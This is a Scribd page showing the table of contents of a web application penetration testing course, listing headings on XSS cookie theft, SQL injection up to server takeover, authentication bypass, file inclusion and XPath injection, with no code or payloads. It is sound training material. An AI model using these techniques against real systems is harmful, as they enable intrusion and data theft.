Scribd
Upload
77 views11 pages

WAPT

The document outlines a comprehensive curriculum for web application penetration testing, covering various modules including web application basics, information gathering, and specific attack vectors like Cross-Site Scripting and SQL Injection. Each module delves into essential concepts, techniques, and mitigation strategies relevant to web security. The content is structured to provide a thorough understanding of vulnerabilities and how to exploit or defend against them.

Uploaded by

محمد غودل Mohammed Ghodal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
77 views11 pages

WAPT

The document outlines a comprehensive curriculum for web application penetration testing, covering various modules including web application basics, information gathering, and specific attack vectors like Cross-Site Scripting and SQL Injection. Each module delves into essential concepts, techniques, and mitigation strategies relevant to web security. The content is structured to provide a thorough understanding of vulnerabilities and how to exploit or defend against them.

Uploaded by

محمد غودل Mohammed Ghodal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 11

WEBAPPLICATION PENETRATION TESTING

•Module 1: Introduction to Web Applications


•Module 2: Information Gathering
•Module 3: Cross-Site Scripting
•Module 4: SQL Injection
•Module 5: Authentication and Authorization
•Module 6: File and Resource Attacks
•Module 7: Web Services
•Module 8: Xpath

0x01 : INTRODUCTION TO WEB APPLICATIONS

2.Introduction to Web Applications


2.1.HTTP/S Protocol Basics
• 2.1.1.HTTP Request
• 2.1.2.HTTP Response
• 2.1.3.HTTP Header Field Definitions
• 2.1.4.HTTPS
2.2.Encoding
• 2.2.1.Introduction
• 2.2.2.Charset
• 2.2.2.1.ASCII
• 2.2.2.2.Unicode

2.2.3.Charset vs. Charset Encoding


• 2.2.3.1.Unicode Encoding
• 2.2.3.2.HTML EncodingHTML Entries
• 2.2.3.3.URL Encoding (percent encoding)
• 2.2.3.4.Base64

2.3.Same Origin
• 2.3.1.Origin definition
• 2.3.2.What does SOP protect from?
• 2.3.3.How SOP works
• 2.3.4.Exceptions
• 2.3.4.1.Windows.location
• 2.3.4.2.Document.domain
• 2.3.4.3.Cross window messaging
• 2.3.4.4.Cross Origin Resource Sharing

2.4.Cookies
• 2.4.1.Cookies Domain
• 2.4.1.1.Specified cookie domain
• 2.4.1.2.Unspecified cookie domain
• 2.4.1.3.Internet Explorer Exception
• 2.4.2.Inspecting the Cookie Protocol
• 2.4.2.1.Login2.4.2.2.Set-Cookie
• 2.4.2.3.Cookie
• 2.4.3.Cookie Installation
• 2.4.3.1.Correct cookie installation
• 2.4.3.2.Incorrect cookie installation
2.5.Sessions
2.6.WebApplication Proxies
• 2.6.1.Burp Suite
• 2.6.2.OWASP ZAP
0x02 : INFORMATION GATHERING

2.Information Gathering
2.1.Gathering information on your target
• 2.1.1.Finding owner, IP and emails
• 2.1.1.1.Whois•Command line•Web based tool
• 2.1.1.2.DNS
• 2.1.1.3.Nslookup(Find target ISP,Netcraft)
2.2.Infrastructure
• 2.2.1.Fingerprinting the web server
• 2.2.1.1.Netcat
• 2.2.1.2.WhatWeb
• 2.2.1.3.Wappalyzer
• 2.2.1.4.Web server modules
• 2.2.2.Enumerating subdomains
• 2.2.2.1.Netcraft
• 2.2.2.2.Google
• 2.2.2.3.Subbrute
• 2.2.2.4.Dnsrecon
• 2.2.2.5.TheHarvester
• 2.2.2.6.Zone transfer
• 2.2.3.Finding virtual hosts
2.3.Fingerprinting frameworks and applications
• 2.3.1.Third party add-ons
• 2.3.2.Mapping results
2.4.Fingerprinting custom applications
• 2.4.1.Burp target crawler
• 2.4.2.Creating a functional graph
• 2.4.3.Mapping the attack surface
• 2.4.3.1.Client side validation
• 2.4.3.2.Database interaction
• 2.4.3.3.Ile uploading and downloading
• 2.4.3.4.Display of user-supplied data
• 2.4.3.5.Redirections
• 2.4.3.6.Access control and login-protected
pages
• 2.4.3.7.Error messages
• 2.4.3.8.Charting

3.5.Enumerating resources
• 3.5.1.Crawling the website
• 3.5.2.Finding hidden files
• 3.5.2.1.Back up and source code
• 3.5.2.2.Enumerating users accounts
• 3.5.2.3.Map
3.6.Relevant information through
misconfigurations
• 3.6.1.Directory listing
• 3.6.2.Log and configuration files
• 3.6.3.HTTP verbs and file upload
3.7.Google hacking
• 3.7.1.Search operators
3.8.Shodan HQ

0x03: CROSS-SITE SCRIPTING


3.1.Cross-Site Scripting
• 3.1.1.Basics
3.2.Anatomy of an XSS Exploitation
3.3.The three types ofXSS
• 3.3.1.Reflected XSS
• 3.3.2.PersistentXSS
• 3.3.3.DOM-based XSS
3.4.Finding XSS
• 3.4.1.Finding XSS in PHP code
3.5.XSS Exploitation
• 3.5.1.XSS andBrowsers
• 3.5.2.XSS Attacks
• 3.5.2.1.Cookie Stealing through XSS
• 3.5.2.2.Defacement
• 3.5.2.3.XSS for advanced phishing attacks
• 3.5.2.4.BeEF
3.6.Mitigation
• 3.6.1.Input Validation
• 3.6.2.Context-Aware outputencoding
• 3.6.3.Never trust user input

0x04: SQL INJECTION


4.SQL Injection
• 4.1.Introduction to SQL Injections
• 4.1.1.SQL Statements
• 4.1.1.1.SELECT
• 4.1.1.2.UNION
4.1.2.SQL Queries inside web applications
4.1.3.Vulnerable dynamic queries
4.1.4.How dangerous is a SQL Injection
4.1.5.SQLi attacks classification
• 4.1.5.1.In-band SQLi
• 4.1.5.2.Error-based SQLi
• 4.1.5.3.Blind SQLi5.2.Finding SQL Injections
4.2.1.Simple SQL Injection scenario
4.2.2.SQL errors in web applications
4.2.3.Boolean-based detection
• 4.2.3.1.Example
4.3.Exploiting In-band SQL Injections
• 4.3.1.First scenario
• 4.3.2.In-band attack challenges
• 4.3.3.Enumerating the number of fields in a
query
• 4.3.3.1.Different DBMS UNION mismatch errors
4.3.4.Blind enumeration
4.3.5.Identifying field types
4.3.6.Dumping the database content
4.4.Exploiting Error-based SQL Injections
• 4.4.1.MS SQL Server Error-based exploitation
• 4.4.2.The CAST Technique
• 4.4.3.Finding the DBMS version
• 4.4.4.Dumping the database data
• 4.4.4.1.Finding the current username
• 4.4.4.2.Finding readable databases
• 4.4.4.3.Enumerating database tables
• 4.4.4.4.Enumerating columns
• 4.4.4.5.Dumping data
4.4.5. ()
4.4.6.MySQL Error-based SQLi
4.4.7.PostgreSQL Error-based SQLi
4.4.8.Developing Error-based SQLi Payloads
4.5.Exploiting blind SQLi
• 4.5.1.String extraction
• 4.5.2.Detecting the current user
• 4.5.3.Scripting blind SQLi data dump
• 4.5.4.Exploiting blind SQLi
• 4.5.4.1.String extraction
4.5.5.Optimize blind SQLi
4.5.6.Time-based blind SQLi
4.6.SQLMap
• 4.6.1.Basic syntax
• 4.6.2.Extracting the database banner
• 4.6.3.Information Gathering
• 4.6.4.Extracting the Database
• 4.6.5.Extracting the Schema
• 4.6.6.SQLMap Advanced Usage
• 4.6.6.1.Forcing the DBMS
• 4.6.6.2.Fine tuning the payloads
• 4.6.6.3.Aggressiveness and load

4.7.Mitigation Strategies
• 4.7.1.Prepare statement
• 4.7.1.1.Implementation
4.7.2.Type casting
4.7.3.Input validation
4.8.From SQLi to Server Takeover
• 4.8.1.Advanced MySQL Exploitation
• 4.8.1.1.xp_cmdshell
• 4.8.1.2.InternetNetwork Host Enumeration
• 4.8.1.3.Port Scanning
• 4.8.1.4.Reading the File System
• 4.8.1.5.Uploading Files
• 4.8.1.6.Storing Command Results into a
Temporary Table
4.8.2.Advanced MySQL Exploitation
• 4.8.2.1.Reading the File System
• 4.8.2.2.Uploading Files
• 4.8.2.3.Executing Shell Commands
4.8.3.Conclusions

0x05: AUTHENTICATION AND AUTHORIZATION

5.1.Introduction
• 5.1.1.Authentication vs. Authorization
• 5.1.2.Authentication factors
• 5.1.2.1.Single-factor authentication
• 5.1.2.2.Two-factor authentication
5.2.Common Vulnerabilities
• 5.2.1.Credentials over unencrypted channel
• 5.2.2.Inadequate password policy
• 5.2.2.1.Dictionary attacks
• 5.2.2.2.Brute force attacks

5.2.3.User enumeration
• 5.2.3.1.Via error messages
• 5.2.3.2.Via website behavior
• 5.2.3.3.Via timing attacks
• 5.2.3.4.Taking advantage of user enumeration
5.2.4.Default or easily-guessable user accounts
5.2.5.The remember me functionality
• 5.2.5.1.Cache browser method
• 5.2.5.2.Cookie method
• 5.2.5.3.Web storage method
• 5.2.5.4.Best defensive techniques
5.2.6.Passwordreset feature
• 5.2.6.1.Easily guessable answers
• 5.2.6.2.Unlimited attempts
• 5.2.6.3.Password reset link
5.2.7.Logout weaknesses
• 5.2.7.1.Incorrect session destruction

5.3.Bypassing Authorization
• 5.3.1.Insecure direct object references
• 5.3.1.1.Best defensive techniques
• 5.3.2.Missing function level access control
5.3.3.Parameter modification
• 5.3.3.1.Vulnerable web application
5.3.4.Incorrect redirection
• 5.3.4.1.Redirect to protect contents
• 5.3.4.2.Best defensive techniques
5.3.5.SessionID prediction
5.3.6.SQL Injections
5.3.7.Local file inclusion and path traversal

0x06: FILE AND RESOURCE ATTACKS


6.File and Resource Attacks
6.1.Path Traversal
• 6.1.1.Path conversion
• 6.1.2.Encoding
• 6.1.3.Best defensive techniques
6.2.File Inclusion Vulnerabilities
• 6.2.1.Local File Inclusion (LFI)
• 6.2.2.Remote File Inclusion (RFI)
6.3.Unrestricted File Upload
• 6.3.1.Vulnerable web application
• 6.3.1.1.The attack

0x07: WEB SERVICES


7.Web Services
7.1.Introduction
7.2.Web Services Implementations
• 7.2.1.XML-RPC
• 7.2.2.JSON-RPC
• 7.2.3.SOAP
• 7.2.4.RESTful

0x08: XPATH INJECTION


8.XPath Injection
8.1.XML Documents and Databases
8.2.Xpath
• 8.2.1.XPath expression and syntax
• 8.2.2.XPath vs. SQL13.3.Detecting XPath
Injection
8.3.1.Error-based injection
8.3.2.Blind injection
• 8.3.2.1.Detect true condition
• 8.3.2.2.Detect false condition
8.3.3.Exploitation
• 8.3.3.1.Bypass XPath query
• 8.3.3.2.Extracting the XML document structure
• 8.3.3.3.Finding out the root node
• 8.3.3.4.Finding the first child node name
• 8.3.3.5.Finding the content of a node

You might also like